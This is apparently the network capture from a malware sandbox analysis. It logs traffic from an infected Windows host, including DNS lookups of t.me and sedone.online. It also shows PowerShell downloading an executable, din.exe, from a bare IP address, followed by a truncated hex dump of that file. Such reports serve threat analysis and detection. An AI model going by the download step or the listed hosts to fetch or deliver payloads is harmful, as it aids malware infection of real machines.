Dec 17, 2024 08:23:06.221652985 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.221716881 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:06.221746922 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.231432915 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.231499910 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:06.231532097 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.240895987 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.240951061 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:06.240982056 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.249485970 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.249547005 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:06.249577999 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.258112907 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.258183956 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:06.258215904 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.266758919 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.266818047 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:06.266848087 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.273864985 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.273931980 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:06.273962975 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.278094053 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.278156996 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:06.278166056 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.283731937 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.284362078 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:06.284385920 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.289635897 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.289700031 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:06.289715052 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.294356108 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.294420958 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:06.294433117 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.300669909 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.300733089 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:06.300817966 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.304924965 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.304989100 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:06.305049896 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.312084913 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.312248945 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:06.312282085 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.315567970 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.315623045 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:06.315654993 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.321135044 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.321222067 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:06.321254969 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.321660995 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.321710110 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:06.321765900 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:06.321789026 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.321805000 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:06.321831942 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:07.145323992 CET	49959	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:07.145370007 CET	443	49959	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:07.145473957 CET	49959	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:07.145742893 CET	49959	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:07.145760059 CET	443	49959	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:07.740251064 CET	49963	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:07.740288019 CET	443	49963	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:07.740741014 CET	49963	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:07.740741014 CET	49963	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:07.740775108 CET	443	49963	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:09.029297113 CET	443	49959	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:09.072285891 CET	49959	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:09.203850031 CET	443	49963	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:09.203910112 CET	49963	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:09.337285995 CET	49963	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:09.337302923 CET	443	49963	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:09.339423895 CET	49963	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:09.339441061 CET	443	49963	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:09.610641956 CET	49969	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:09.610688925 CET	443	49969	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:09.610742092 CET	49969	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:09.612011909 CET	49969	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:09.612026930 CET	443	49969	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:09.784015894 CET	49959	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:10.382860899 CET	443	49963	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:10.382947922 CET	443	49963	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:10.382949114 CET	49963	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:10.383285999 CET	49963	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:10.384083986 CET	49963	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:10.384107113 CET	443	49963	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:10.608637094 CET	49976	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:10.608716011 CET	443	49976	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:10.608839989 CET	49976	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:10.609181881 CET	49976	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:10.609199047 CET	443	49976	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:11.012913942 CET	443	49969	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:11.013036013 CET	49969	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:11.013590097 CET	49969	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:11.013601065 CET	443	49969	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:11.016367912 CET	49969	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:11.016374111 CET	443	49969	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:11.016458035 CET	49969	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:11.016469955 CET	443	49969	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:11.016498089 CET	49969	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:11.016503096 CET	443	49969	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:11.016515970 CET	49969	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:11.016526937 CET	443	49969	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:11.016671896 CET	49969	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:11.016688108 CET	443	49969	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:11.016702890 CET	49969	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:11.016714096 CET	443	49969	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:11.016773939 CET	49969	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:11.016788960 CET	443	49969	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:11.016808033 CET	49969	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:11.016808033 CET	49969	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:11.016824961 CET	443	49969	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:11.016839027 CET	443	49969	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:11.016891003 CET	49969	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:11.016911983 CET	443	49969	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:11.016911983 CET	49969	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:11.016923904 CET	49969	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:11.016927004 CET	443	49969	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:11.016935110 CET	49969	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:11.016937971 CET	443	49969	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:11.016951084 CET	443	49969	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:11.016976118 CET	49969	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:11.016984940 CET	443	49969	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:11.017030001 CET	49969	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:11.017045975 CET	443	49969	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:11.017060995 CET	49969	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:11.017065048 CET	49969	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:11.017076969 CET	443	49969	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:12.007756948 CET	443	49976	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:12.010113001 CET	49976	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:12.015886068 CET	49976	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:12.015924931 CET	443	49976	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:12.018407106 CET	49976	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:12.018423080 CET	443	49976	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:12.018578053 CET	49976	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:12.018615961 CET	443	49976	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:12.018980026 CET	49976	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:12.019027948 CET	443	49976	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:12.019334078 CET	49976	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:12.019354105 CET	443	49976	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:12.958651066 CET	443	49969	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:12.958724022 CET	443	49969	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:12.958848953 CET	49969	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:13.420381069 CET	49969	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:13.420403957 CET	443	49969	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:13.521384954 CET	443	49976	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:13.521452904 CET	443	49976	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:13.521452904 CET	49976	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:13.521502018 CET	49976	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:13.522816896 CET	49976	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:13.522836924 CET	443	49976	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:13.702626944 CET	49982	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:13.702667952 CET	443	49982	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:13.702752113 CET	49982	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:13.703442097 CET	49982	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:13.703458071 CET	443	49982	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:14.719039917 CET	49988	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:14.719095945 CET	443	49988	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:14.719835043 CET	49988	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:14.719872952 CET	49988	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:14.719880104 CET	443	49988	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:15.113101959 CET	443	49982	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:15.113169909 CET	49982	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:15.113637924 CET	49982	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:15.113645077 CET	443	49982	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:15.115744114 CET	49982	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:15.115753889 CET	443	49982	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:15.115828037 CET	49982	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:15.115838051 CET	443	49982	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:15.115856886 CET	49982	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:15.115860939 CET	443	49982	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:15.115904093 CET	49982	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:15.115916967 CET	443	49982	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:15.115925074 CET	49982	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:15.115930080 CET	443	49982	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:15.116028070 CET	49982	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:15.116039038 CET	443	49982	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:15.116059065 CET	49982	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:15.116066933 CET	49982	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:15.116173983 CET	443	49982	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:15.116219044 CET	49982	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:15.116228104 CET	443	49982	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:15.116241932 CET	49982	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:15.116249084 CET	443	49982	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:15.116281033 CET	49982	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:15.116290092 CET	443	49982	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:16.124552965 CET	443	49988	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:16.125998974 CET	49988	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:16.935898066 CET	443	49982	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:16.935962915 CET	49982	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:16.935991049 CET	443	49982	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:16.936023951 CET	443	49982	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:16.936038017 CET	49982	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:16.936078072 CET	49982	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:18.709631920 CET	50000	443	192.168.2.7	94.245.104.56
Dec 17, 2024 08:23:18.709731102 CET	443	50000	94.245.104.56	192.168.2.7
Dec 17, 2024 08:23:18.709817886 CET	50000	443	192.168.2.7	94.245.104.56
Dec 17, 2024 08:23:18.710037947 CET	50000	443	192.168.2.7	94.245.104.56
Dec 17, 2024 08:23:18.710074902 CET	443	50000	94.245.104.56	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 17, 2024 08:21:16.690843105 CET	123	123	192.168.2.7	40.81.94.65
Dec 17, 2024 08:21:17.281220913 CET	123	123	40.81.94.65	192.168.2.7
Dec 17, 2024 08:21:59.420531988 CET	51310	53	192.168.2.7	1.1.1.1
Dec 17, 2024 08:21:59.642549992 CET	53	51310	1.1.1.1	192.168.2.7
Dec 17, 2024 08:22:10.788080931 CET	138	138	192.168.2.7	192.168.2.255
Dec 17, 2024 08:22:42.988893986 CET	64362	53	192.168.2.7	1.1.1.1
Dec 17, 2024 08:22:43.126665115 CET	53	64362	1.1.1.1	192.168.2.7
Dec 17, 2024 08:22:45.070342064 CET	54012	53	192.168.2.7	1.1.1.1
Dec 17, 2024 08:22:45.464167118 CET	53	54012	1.1.1.1	192.168.2.7
Dec 17, 2024 08:23:02.765409946 CET	64791	53	192.168.2.7	1.1.1.1
Dec 17, 2024 08:23:02.765759945 CET	54517	53	192.168.2.7	1.1.1.1
Dec 17, 2024 08:23:02.788616896 CET	53	62059	1.1.1.1	192.168.2.7
Dec 17, 2024 08:23:02.805844069 CET	53	60021	1.1.1.1	192.168.2.7
Dec 17, 2024 08:23:02.902774096 CET	53	64791	1.1.1.1	192.168.2.7
Dec 17, 2024 08:23:02.903259039 CET	53	54517	1.1.1.1	192.168.2.7
Dec 17, 2024 08:23:05.919044018 CET	53	50464	1.1.1.1	192.168.2.7
Dec 17, 2024 08:23:07.104257107 CET	53	64620	1.1.1.1	192.168.2.7
Dec 17, 2024 08:23:18.228739977 CET	53130	53	192.168.2.7	1.1.1.1
Dec 17, 2024 08:23:18.229149103 CET	52572	53	192.168.2.7	1.1.1.1
Dec 17, 2024 08:23:18.465595961 CET	53	52572	1.1.1.1	192.168.2.7

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Dec 17, 2024 08:23:18.465684891 CET	192.168.2.7	1.1.1.1	c24a	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 17, 2024 08:21:59.420531988 CET	192.168.2.7	1.1.1.1	0xd217	Standard query (0)	IuwKjpytGYqQ.IuwKjpytGYqQ	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:22:42.988893986 CET	192.168.2.7	1.1.1.1	0x66fe	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:22:45.070342064 CET	192.168.2.7	1.1.1.1	0x552b	Standard query (0)	sedone.online	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:23:02.765409946 CET	192.168.2.7	1.1.1.1	0xfad7	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:23:02.765759945 CET	192.168.2.7	1.1.1.1	0x7704	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 17, 2024 08:23:18.228739977 CET	192.168.2.7	1.1.1.1	0xdfbe	Standard query (0)	ntp.msn.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:23:18.229149103 CET	192.168.2.7	1.1.1.1	0x24ea	Standard query (0)	ntp.msn.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 17, 2024 08:21:10.067523003 CET	1.1.1.1	192.168.2.7	0x5b31	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:21:10.067523003 CET	1.1.1.1	192.168.2.7	0x5b31	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:21:30.075274944 CET	1.1.1.1	192.168.2.7	0xdb3d	No error (0)	edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 08:21:30.075274944 CET	1.1.1.1	192.168.2.7	0xdb3d	No error (0)	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		217.20.58.98	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:21:30.075274944 CET	1.1.1.1	192.168.2.7	0xdb3d	No error (0)	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		217.20.58.100	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:21:30.075274944 CET	1.1.1.1	192.168.2.7	0xdb3d	No error (0)	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		217.20.58.101	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:21:30.075274944 CET	1.1.1.1	192.168.2.7	0xdb3d	No error (0)	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		217.20.58.99	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:21:59.642549992 CET	1.1.1.1	192.168.2.7	0xd217	Name error (3)	IuwKjpytGYqQ.IuwKjpytGYqQ	none	none	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:22:43.126665115 CET	1.1.1.1	192.168.2.7	0x66fe	No error (0)	t.me		149.154.167.99	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:22:45.464167118 CET	1.1.1.1	192.168.2.7	0x552b	No error (0)	sedone.online		116.203.12.114	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:23:02.902774096 CET	1.1.1.1	192.168.2.7	0xfad7	No error (0)	www.google.com		172.217.19.228	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:23:02.903259039 CET	1.1.1.1	192.168.2.7	0x7704	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 17, 2024 08:23:18.366481066 CET	1.1.1.1	192.168.2.7	0xdfbe	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 08:23:18.465595961 CET	1.1.1.1	192.168.2.7	0x24ea	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 08:23:18.651951075 CET	1.1.1.1	192.168.2.7	0xebc2	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 08:23:18.651951075 CET	1.1.1.1	192.168.2.7	0xebc2	No error (0)	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		94.245.104.56	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:23:18.779402971 CET	1.1.1.1	192.168.2.7	0x20a0	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Request Dependency Graph

t.me

sedone.online

www.google.com

138.124.60.133

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49762	138.124.60.133	80	7796	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:21:44.698105097 CET	325	OUT	GET /din.exe HTTP/1.1 Accept: / Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 138.124.60.133 Connection: Keep-Alive
Dec 17, 2024 08:21:45.896568060 CET	1236	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 07:21:45 GMT Server: Apache/2.4.58 (Ubuntu) Last-Modified: Mon, 16 Dec 2024 20:29:52 GMT ETag: "14b637-629690af42832" Accept-Ranges: bytes Content-Length: 1357367 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 d0 0d 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 70 16 00 00 04 00 00 d1 98 15 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$A{k888b<88b,888888%88"88Rich8PELGOtB8@p@@r_`.textrt `.rdatan+,x@@.data+@.ndata.rsrcr_`@@.reloc`@B
Dec 17, 2024 08:21:45.896646976 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: U\}t+}FEuHGHPuuu@KSV5GWEPu@eEEPu@}eD@FRVVU+MM
Dec 17, 2024 08:21:45.896684885 CET	1236	IN	Data Raw: 08 40 00 00 56 83 e1 0f ff 34 8a 05 e8 c0 40 00 50 e8 a9 53 00 00 83 7c 24 08 00 8b f0 7d 06 56 e8 cd 4b 00 00 8b c6 5e c2 04 00 55 8b ec 81 ec 10 02 00 00 53 56 57 8d 45 fc 50 a1 90 eb 47 00 83 c8 08 50 33 db 53 ff 75 0c ff 75 08 ff 15 04 90 40 Data Ascii: @V4@PS\|$}VK^USVWEPGP3Suu@;ui5@9]uKSPuuWPSutu@jN;t$S5Guuu@3@_^[9Guuu@uU@@Vt
Dec 17, 2024 08:21:45.896722078 CET	1236	IN	Data Raw: 40 00 eb 0d 57 68 4c 9c 40 00 c7 45 fc 01 00 00 00 e8 73 49 00 00 59 e9 49 fe ff ff 53 e8 f4 fa ff ff 8b f0 8d 45 08 50 57 68 04 20 00 00 56 ff 15 70 90 40 00 85 c0 74 24 8b 45 08 3b c6 76 29 66 39 18 74 24 56 e8 70 49 00 00 3b c3 74 0e 83 c0 2c Data Ascii: @WhL@EsIYISEPWh Vp@t$E;v)f9t$VpI;t,PuF3fE9]+h WWl@jMQVh SPSh@3EfjXPVDEj16EVPQ
Dec 17, 2024 08:21:45.896756887 CET	1236	IN	Data Raw: 8b f8 e8 25 f6 ff ff 8b c8 8b 45 e0 83 f8 0c 77 69 ff 24 85 18 32 40 00 03 f9 eb 5e 2b f9 eb 5a 0f af f9 eb 55 3b cb 74 07 8b c7 99 f7 f9 eb 1e 33 ff c7 45 fc 01 00 00 00 eb 3f 0b f9 eb 3b 23 f9 eb 37 33 f9 eb 33 33 c0 3b fb 0f 94 c0 8b f8 eb 28 Data Ascii: %Ewi$2@^+ZU;t3E?;#7333;(;u;t3G;u3;tWCjjYPWVH@E=@;t^H;t?;u;u"uh@CYYh jS@IPEW@V/A@
